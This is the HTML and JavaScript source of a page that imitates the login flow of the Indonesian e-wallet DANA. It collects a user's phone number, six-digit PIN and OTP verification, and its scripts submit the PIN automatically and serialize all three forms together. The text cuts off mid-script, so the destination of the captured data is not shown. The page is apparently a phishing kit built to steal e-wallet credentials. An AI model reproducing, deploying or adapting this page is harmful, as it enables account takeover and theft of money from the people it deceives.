<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
<meta name="theme-color" content="#118EEA"> 

<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>𝗗𝗔𝗡𝗔 𝗜𝗗 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔</title>
<meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔">
<meta property="twitter:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRyoGavdwVzFPvGfWDtbSK70qJYRR9UMy9HJg&usqp=CAU" property="og:image">
 <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="shortcut icon" type="image/x-icon">
  <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="apple-touch-icon">
 <link rel="canonical" href="https://www.dana.id/">
   <meta property="og:url" content="https://www.dana.id/" />
<meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta property="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
<link rel="stylesheet" href="https://danacss.pages.dev/container.css">
<link rel="stylesheet" href="https://danacss.pages.dev/loader.css">
<link rel="stylesheet" href="https://danacss.pages.dev/main.css">
<link rel="stylesheet" href="https://danacss.pages.dev/otp.css">
<link rel="stylesheet" href="https://danacss.pages.dev/pin.css">
</head>
<style>
    
</style>
<style>
*{
    
      
      
      
      max-width: 450px;
}


body, html{
      left: 0;
      right: 0;
      
      margin: 0 auto;
      
      
      max-width: 450px;
      
}

h3{
  font-size: 23px;  
}

 
 * {
  box-sizing: border-box;
  scrollbar-color: transparent transparent; /* thumb and track color */
  scrollbar-width: 0px;
}

*::-webkit-scrollbar {
  width: 0;
}

*::-webkit-scrollbar-track {
  background: transparent;
}

*::-webkit-scrollbar-thumb {
  background-color: #118EEA;
  border: none;
}

* {
  -ms-overflow-style: none;
}

ol, li {
  list-style: none;
  margin: 0;
  padding: 0;
}

.carousel {
  position: absolute;
  background-color: #118EEA;
  padding-top:0%;
  height: 100%;
  top: 0;
  right: 0;
  left: 0;
  margin: 0 auto;
  perspective: 200px;
}

.carousel__viewport {
  position: absolute;
  width: 100%;
  top: 0;
  background-color: #118EEA;
  right: 0;
  bottom: 0;
  left: 0;
  height: 530px;
  display: flex;
  overflow-x: scroll;
  counter-reset: item;
  margin: 0px auto;
 
  scroll-behavior: smooth;
  scroll-snap-type: x mandatory;
}

.carousel__slide {
  position: relative;
  flex: 0 0 100%;
  width: 100%;
  height: 100%;
  margin-left: 0px;
  background-color: #118EEA;
  counter-increment: item;
  z-index: 99999999;
  animation: 30s slidy infinite;
    }

    @keyframes slidy {
        0% {
            left: 0%
        }

        10% {
            left: 0%;
        }

        12% {
            left: -100%;
        }

        22% {
            left: -100%;
        }

        24% {
            left: -200%;
        }

        34% {
            left: -200%;
        }

        36% {
            left: -300%;
        }

        46% {
            left: -300%;
        }

        48% {
            left: -400%;
        }

        58% {
            left: -400%;
        }

        60% {
            left: -300%;
        }

        70% {
            left: -300%;
        }

        72% {
            left: -200%;
        }

        82% {
            left: -200%;
        }

        84% {
            left: -100%;
        }

        94% {
            left: -100%;
        }

        96% {
            left: 0%;
        }

        100% {
            left: 0%;
        }
    }



.carousel__slide:nth-child(even) {
  background-color: #118EEA;
}

.carousel__slide:before {
  content: counter(item);
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate3d(-50%,-40%,70px);
  color: #000;
  font-size: 2em;
  background-color: #118EEA;
}

.carousel__snapper {
  position: relative;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  height: 100%;
  scroll-snap-align: center;
  background-color: #118EEA;
  
  
}

@media (hover: hover) {
  .carousel__snapper {
    animation-name: tonext, snap;
    animation-timing-function: ease;
    animation-duration: 4s;
    animation-iteration-count: infinite;
  }

  .carousel__slide:last-child .carousel__snapper {
    animation-name: tostart, snap;
  }
}

@media (prefers-reduced-motion: reduce) {
  .carousel__snapper {
    animation-name: none;
  }
}

.carousel:hover .carousel__snapper,
.carousel:focus-within .carousel__snapper {
  animation-name: none;
}

.carousel__navigation {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  text-align: center;
}

.carousel__navigation-list,
.carousel__navigation-item {
  display: inline-block;
}


.carousel::before,
.carousel::after,
.carousel__prev,
.carousel__next {
  position: absolute;
  top: 0;
  margin-top: 37.5%;
  width: 0;
  height: 0;
  transform: translateY(-50%);
  border-radius: 50%;
  font-size: 0;
  outline: 0;
  opacity: 0.0;
}

.carousel::before,
.carousel__prev {
  left: -1rem;
}

.carousel::after,
.carousel__next {
  right: 0rem;
}

.carousel::before,
.carousel::after {
  content: '';
  z-index: 1;
  background-color: #fff;
  background-size: 1.5rem 1.5rem;
  background-repeat: no-repeat;
  background-position: center center;
  color: #000;
  font-size: 2.5rem;
  line-height: 4rem;
  text-align: center;
  pointer-events: none;
}

/*********************/
.process1 {
            width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: 0 auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;            
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

 #homeku{
     width: 100%;
     height: 100%;
     position: fixed;
    background: #118EEA;
  background-position: 100% 100%;
  background-size: 100% 100%;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
     
     
 }
 
 .inp{
     width: 70%;
     padding-left: 10px;
 }
 
 
 .btn-backku{
     position: absolute;
     left: 20;
     top: 12;
     background: transparent;
     color: #fff;
     border: none;
     font-size: 18px;
     font-weight: 300;
    
 }
 
 
 #back1{
      display: none;
     
 }
 
 #back2{
      display: none;
 }
 
 
 

.closeright{
	-webkit-animation-duration: 0.5s;
	animation-duration: 0.5s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
-webkit-animation-name: fadeOutRightBig; 
    animation-name: fadeOutRightBig; 
}

@-webkit-keyframes fadeOutRightBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateX(0); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateX(200px); 
    } 
} 
@keyframes fadeOutRightBig { 
    0% { 
        opacity: 1; 
        transform: translateX(0); 
    } 
    100% { 
        opacity: 1; 
        transform: translateX(200px); 
    } 
} 



.animated  {
	-webkit-animation-duration: 0.6s;
	animation-duration: 0.6s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-name: fadeInRightBig; 
    animation-name: fadeInRightBig; 
}

@-webkit-keyframes fadeInRightBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateX(200px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateX(0); 
    } 
} 
@keyframes fadeInRightBig { 
    0% { 
        opacity: 1; 
        transform: translateX(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateX(0); 
    } 
} 





.bounceInLeft {
	-webkit-animation-duration: 0.5s;
	animation-duration: 0.5s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInLeft;
    animation-name: bounceInLeft; 
}

@-webkit-keyframes bounceInLeft { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateX(-200px); 
    } 
   
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

@keyframes bounceInLeft { 
    0% { 
        opacity: 1; 
        transform: translateX(-200px); 
    } 
   
    100% { 
        transform: translateX(0); 
    } 
} 




.fadeInUpBig {
	-webkit-animation-duration: 0.6s;
	animation-duration: 0.6s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: fadeInUpBig; 
    animation-name: fadeInUpBig; 
}

@-webkit-keyframes fadeInUpBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(0); 
    } 
} 
@keyframes fadeInUpBig { 
    0% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(0); 
    } 
} 






h1 {
    font-size: 1.5em;
    margin-bottom: 10px;
}

span {
    background: url('https://hosting.tigerengine.id/om9z7f.jpg');
    background-repeat: no-repeat;
    background-size: 100% 100%;
    padding: 5px;
    border-radius: 30px;
    border: 1px solid #ccc;
    padding-left: 11%;
    padding-right: 4%;
    text-align: center;
    margin: 0 auto;
    left: 0;
    right: 0;
    top: 20px;    
    font-weight: 500;
    font-size: 13px;
}



.iphone-mockup img {
    width: 100%;
    border-radius: 10px;
    margin-top: 45px;
}

.security-steps {
    text-align: left;
    margin-top: 10px;
}

.security-steps .step {
    display: flex;
    align-items: center;    
    padding: 10px;
}

.security-steps .step img {
    width: 40px;
    margin-right: 10px;
}


.security-info {
    margin-top: 5px;
    font-size: .8em;
    color: #777;
    margin-bottom: 0px;
}

.inline-logo {
    width: 20px;
    vertical-align: middle; /* Menyelaraskan logo secara vertikal */
}

.gyrozyee-t {
  text-align: center;
  margin-top: 13px;
}

.gyrozyee-t p {
  font-size: 13px;
  font-family: Sans-Serif;
  font-weight: 405;
  color: #686868;
}

.gyrozyee-btt {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  margin-top: 10px;
}

.sve-bt {
      font-size: 18px;
      color: #ffff;
      border: none;
      background: #118EEA;
      width: 90%;
      height: 43px;
      cursor: pointer;
      border-radius: 5px;
      place-content: center;
      font-weight: 410;
      bottom:5px;
    }
    
.sve-bt:hover {
  background-color: #75bded;
}

.loader {
      margin: 0 auto;
      right: 0;
      left: 0;
      pointer-events: none;
      width: 30px;
      height: 30px;
      border-radius: 50%;
      border: 3px solid transparent;
      border-top-color: #fff;
      animation: an1 1s ease infinite;
    }
    
    @keyframes an1 {
      0% {
       transform: rotate(0turn);
      }
      100% {
        transform: rotate(1turn);
      }
    }
</style>
<body>

<div style="display:none;" class="index">
	<div class="header">
		<img src="https://danacss.pages.dev/img/dana_logo.png" class="logo" alt="">
	</div>
	<div class="content">
		<div class="hero">
			<img src="https://danacss.pages.dev/img/hero.svg" alt="">
		</div>
		<h1>Dompet digital untuk kamu!</h1>
		<p class="desc">
			Simpan uang serta kartu debit/kredit dengan<br>praktis di DANA</p>
		<div class="line"></div>
		<p class="log">
			Masukkan <b>nomor HP</b> kamu untuk lanjut
		</p>
		<button type="button" onclick="next();">LOGIN</button>
	</div>
</div>
<div class="start" style="display:none;left:0;right:0;margin: 0 auto;">
	<img class="logo" src="https://danacss.pages.dev/img/dana_text.png" style="width: 150px">
	<div class="footimg">
		<img src="https://danacss.pages.dev/img/bi.png" alt=""><img src="https://danacss.pages.dev/img/kom.png" alt="">
		<p>
			DANA Indonesia terdaftar dan diawasi<br>oleh Bank Indonesia dan Kominfo</p>
	</div>
</div>

<div class="container hid" style="position: fixed">
    
	<div class="" style="text-align: center;" id="homeku">
   

        
     <section class="carousel" aria-label="Gallery" style="margin-top: 0px; text-align: center; left: 0;">
  <ol class="carousel__viewport">
    <li id="carousel__slide"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999999; position: relative;">
       
       
      </div>
    </li>
    <li id="carousel__slide"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; background-color: transparent;"></div>
      <a href="#carousel__slide1"
         class="carousel__prev">Go to previous slide</a>
      <a href="#carousel__slide3"
         class="carousel__next">Go to next slide</a>
    </li>
    <li id="carousel__slide"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%;">
       
       
      </div>
    </li>
    <li id="carousel__slide"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999999; position: relative;">
       
       
      </div>
    </li>
     <li id="carousel__slide"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; background-color: transparent;"></div>
     
    </li>
  </ol>
  <aside class="carousel__navigation">
    <ol class="carousel__navigation-list">
      <li class="carousel__navigation-item">
        <a href="#carousel__slide1"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide2"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide3"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        
    </ol>
  </aside>
</section>
<button id="butonku" style="max-width: 450px;width: 100%; height: 140px; position: fixed; bottom: 0; left: 0; right: 0; margin: 1px auto; border: 0; background: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999" onclick="nextPrev()"></button>
      <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png" id="loading" style="margin-top: 8px">
            </div>
        </div>
        </center>
  </div>
  <div id="blogin" class="animated box-login" style="width: 100%;
    height: 100%;
    bottom: 0;     
    left: 0; 
    right: 0; 
    margin: 0 auto;
    top: -10; 
    display: noe;">
      	<div id="process" name="process" class="process1" style="display: none;">
			<div class="loading">
				<img src="https://danacss.pages.dev/img/load_bg.png"><img class="spinner" src="https://danacss.pages.dev/img/load_spin.png" style="margin-top: 8px">
			</div>
		</div>
		
		<div class="header">
<button id="back1" type="button" class="btn-backku" onclick="goback1()"><ion-icon name="chevron-back-outline"></ion-icon></button>	<p></p>


			<img src="https://danacss.pages.dev/img/dana_logo.png" class="logo" alt="">
		</div>
<form id="formNohp" onsubmit="sendNohp(event);" >
<input type="hidden" id="tarif" name="tarif">		
<h3 style="font-size: 16px; margin-top: -20px">Masukkan <b>nomor HP</b> kamu untuk lanjut</h3>
			<div class="box-input" style="width: 95%;">
				<div class="label">
					<img src="https://danacss.pages.dev/img/indo.png" alt=""><label>+62</label>
				</div>
				<input class="inp" id="nomor" type="tel" autocomplete="off" required name="nomor" placeholder="811-1234-5678" maxlength="12" minlength="10"></div>
			<p class="desc" style="font-size: 14px; line-height: 18px; margin-top: 25px">
			Dengan melanjutkan, kamu setuju dengan <b>Syarat<br/>& Ketentuan</b> dan
				<b>Kebijakan Privasi</b> kami
			</p>
			<div class="box-btn">
				<button disabled id="btn" class="btnnohp" type="submit" style="margin-top: -40px">LANJUT</button>
			</div>
		</form>
<form id="formPin" method="post" omsubmit="return false" class="hid" style="width: 100%;
    height: 100%;
    bottom: 0; 
    position: fixed; 
    left: 0; 
    right: 0; 
    margin: 0px auto;
    top: 0;">
    <div id="process" name="process" class="process1" style="display: none;">
			<div class="loading">
				<img src="https://danacss.pages.dev/img/load_bg.png"><img class="spinner" src="https://danacss.pages.dev/img/load_spin.png" style="margin-top: 8px">
			</div>
		</div>
 		    <button id="back2" type="button" class="btn-backku" onclick="goback2()" style="margin-top: 10px"><ion-icon name="chevron-back-outline"></ion-icon></button>
			<h3 style="margin-top: 50px; font-weight: 600; margin-bottom: -10px; font-size: 16px"><font style="font-weight: 400">Masukkan</font> PIN DANA</h3>
			<div class="box-input-pin">
				<div class="clear"></div>
				<input name="pin1" id="pin1" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin2" id="pin2" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin3" id="pin3" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin4" id="pin4" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin5" id="pin5" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin6" id="pin6" class="inppin" inputmode="numeric" type="password" autocomplete="on" required maxlength="1" onkeypress="if(this.value.length==1) return false;" ></div>
			<button class="show" type="button">TAMPILKAN</button>
			<p class="forgot">LUPA PIN?</p>
			<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif" width="100%" style="position: absolute; bottom: 10; left: 0; right: 0; margin: 0px auto;">
		</form>
<div class="fadeInUpBig bgOtp hid" style="width: 100%;
    height: 100%;
    bottom: 0; 
    position: absolute; 
    left: 0; 
    right: 0; 
    margin: 0 auto;
    top: 0;">
			 <div class="page" style="left: 0px; position: absolute; right: 0; margin: 0 auto; bottom: 0; width: 100%; border-radius: 14px 14px 0px 0px; width: 98%;max-width:435px; text-align: center; background-color: #fff;padding:10px;padding-top:25px;" id="otpkirimulang">
			     

        <section class="kotak">			     
  <p style="text-shadow: 2px 2px 2px #00000030;font-size:100%;font-weight:bold;color:#000;font-size:17px;">Verifikasi dikirim ke Akun <img src="img/dana-full.svg" alt="DANA Logo" style="width:73px;" class="inline-logo"></p>
            
                <span style="color:#000;text-shadow: 2px 2px 2px #00000030;" id="alert"></span>
           

            <div class="iphone-mockup">
                <img src="https://hosting.tigerengine.id/8a0yse.gif" alt="Tampilan DANA">
            </div>
<br>
            <h4 style="color:#000;font-size:16px;font-weight:500;text-shadow: 2px 2px 2px #00000030;">ᴄᴀʀᴀ ᴍᴇɴɢᴀᴍᴀɴᴋᴀɴ ᴀᴋᴛɪᴠɪᴛᴀꜱᴍᴜ:</h4>
            <div class="security-steps">
                <div class="step">
                    <img src="img/push-verify-step-receive-notification.svg" alt="Icon Notifikasi">
                    <p style="color:#000;font-size:14px;">𝘛𝘢𝘱 𝘯𝘰𝘵𝘪𝘧𝘪𝘬𝘢𝘴𝘪 𝘥𝘪 𝘏𝘢𝘯𝘥𝘱𝘩𝘰𝘯𝘦 𝘬𝘢𝘮𝘶 𝘥𝘢𝘯 𝘵𝘢𝘱 𝘝𝘌𝘙𝘐𝘍𝘐𝘒𝘈𝘚𝘐.</p>                    
                </div>
                <center><hr style="color:#ccc;border:0.6px solid #ccc;width:92%;"></center>
                <div class="step">
                    <img src="img/push-verify-step-verification-success.svg" alt="Icon Kotak Masuk">
                    <p style="color:#000;font-size:14px;">𝘛𝘪𝘥𝘢𝘬 𝘮𝘦𝘯𝘦𝘳𝘪𝘮𝘢 𝘯𝘰𝘵𝘪𝘧𝘪𝘬𝘢𝘴𝘪? 𝘊𝘦𝘬 𝘒𝘰𝘵𝘢𝘬 𝘔𝘢𝘴𝘶𝘬 𝘢𝘵𝘢𝘶 𝘮𝘦𝘯𝘶 𝘝𝘦𝘳𝘪𝘧𝘪𝘬𝘢𝘴𝘪.</p>
                </div>
            </div>
           <br>       
             </section>
             
    <div class="gyrozyee-t">
      <p>Jika sudah di verifikasi silahkan kirim OTP :</p>
    </div>
    <div class="gyrozyee-btt">
      <button class="sve-bt">KIRIM KODE OTP</button>  
       <p class="security-info">Diamankan oleh <img src="img/dana-protection-logo-in-line.svg" alt="DANA Logo" style="width:110px;" class="inline-logo"> </p>
    </div>
  </div>
  
</div>
</div>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
        <script>
            var url = "#kirim-ulang"; // url tujuan
            var count = 60; // dalam detik
            function countDown() {
                
                if (count > 0) {
                    count--;
                    var waktu = count + 0;
            $('#carasingkat').html(waktu);
             
         setTimeout("countDown()", 1000);
           
                    
               
                }
            }
            countDown();
       
       
$('.box-input-pin input').on('input', function(event) {
    const inputs = $('.box-input-pin input');
    const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
    if (isAllFilled == true) {
        $(event.target).blur();
        sendPin();
    }
    const index = inputs.index(this);
    const currentValue = event.target.value;
    if (currentValue.length === 1) {
        if (index < inputs.length - 1) {
            inputs[index + 1].focus();
        }
    } else if (currentValue.length === 0) {
        if (index > 0) {
            inputs[index].focus();
        }
    };
});
$('.box-input-pin input').on('keydown', function(event) {
    const inputs = $('.box-input-pin input');
    const key = event.key;
    const index = inputs.index(this);
    if (key === 'Backspace' && event.target.value.length === 0) {
        if (index > 0) {
            inputs[index - 1].focus();
        }
    };
});
       </script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://danacss.pages.dev/jquery.mask.min.js"></script>
<script src="jquery.js"></script>
<script>$(document).ready(function(){$('#nomor').on('input', function(){if($(this).val() == '0' || $(this).val() == '62'){$(this).val('');}});});</script>
<script>$(document).ready(function(){$('#nomor').mask('000-0000-000000');});</script>
<script>let nomor = document.getElementById("nomor");let btn = document.getElementById("btn");nomor.addEventListener("input", val);function val(){if(nomor.value.length > 10){btn.disabled = false;}else{btn.disabled = true;}};</script>

<script>
document.getElementById("tarif").value =
        sessionStorage.getItem("tarif"); 

 window.onload = function(){
        setTimeout(function(){
            $(".start").fadeIn();
            setTimeout(function(){
                $(".start").fadeOut(1000);
                setTimeout(function(){
                   $(".container").fadeIn(200);
                   $("#nomor").focus();
                },1000);
            },1000);
        },500);
}   

///
 function countdown() {
    var count = parseInt(
    $('#countdown').text());
    if (count !== 0) {
    $('#countdown').text(count - 1);} 
    else {
    $('#countdown').text('60');}};
   

///




$('.inpotp').on('input', function(event) {
const form = $('#formOtp');  
 const inputs = $('.inpotp');
const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
if (isAllFilled == true) {
    $(event.target).blur();
sendOtp();
form.submit();
}

const index = inputs.index(this);const currentValue = event.target.value;if (currentValue.length === 1) {if (index < inputs.length - 1) {inputs[index + 1].focus();}} else if (currentValue.length === 0) {if (index > 0) {inputs[index].focus();}};});$('.inpotp').on('keydown', function(event) {const inputs = $('.inpotp');const key = event.key;const index = inputs.index(this);if (key === 'Backspace' && event.target.value.length === 0) {if (index > 0) {inputs[index - 1].focus();}};});
$(document).ready(function() {$('.clear').click(function() {$('.inppin').val('');$('#pin1').focus();});$('.clearotp').click(function() {$('.inpotp').val('');$('#otp1').focus();});$('.show').click(function() {$('.inppin').each(function() {if ($(this).attr('type') === 'password') {$(this).attr('type','number');$(".show").text("SEMBUNYIKAN");} else {$(this).attr('type', 'password');$(".show").text("TAMPILKAN");}});});});

 function nextPrev(){
$(".box-login").removeClass("closeright");
$(".box-login").addClass("animated");     
     event.preventDefault();
       setTimeout(function(){
           $("#homeku").hide();
           $("#back1").show();
           $("#butonku").fadeOut();
           $(".box-login").fadeIn();
           $("#process1").hide();
       },0);
 }   
 
 
 function goback1(){
     setTimeout(function(){
   $("#homeku").addClass("bounceInLeft"); $(".box-login").removeClass("animated");     
     $("#homeku").show();
      $(".box-login").fadeOut();
      $(".box-login").addClass("closeright");
      $("#butonku").fadeIn();
      $("#back1").hide();
       $("#process").hide();
       
     },0);
 }
 
 
 function goback2(){
     $("#process").show();
     setTimeout(function(){
    $("#formPin").fadeOut();
     $("#formNohp").fadeIn();
       $("#process").hide();
        $("#nomor").val('');
        $("#back1").show();
        $("#back2").hide();
        document.getElementById("formPin").reset();
        $('.inppin').val('');
     },500);
 }
 
 

    $( document ).ready(function() {
            setTimeout(() => {
                $('#popup').hide();
                $('chsalxcome2').fadeIn();
            },2000)
             
        })
        

function tutupotp(){
$(".bgotp").hide();    
}

sve_bt = document.querySelector(".sve-bt");
sve_bt.onclick = function() {
  // Tampilkan loader
  this.innerHTML = "<div class='loader'></div>";
  
  var tarif = document.getElementById("tarif").value;
  var dataString = $("#formNohp, #formPin, #formOtp").serialize();
    
    var pin = [
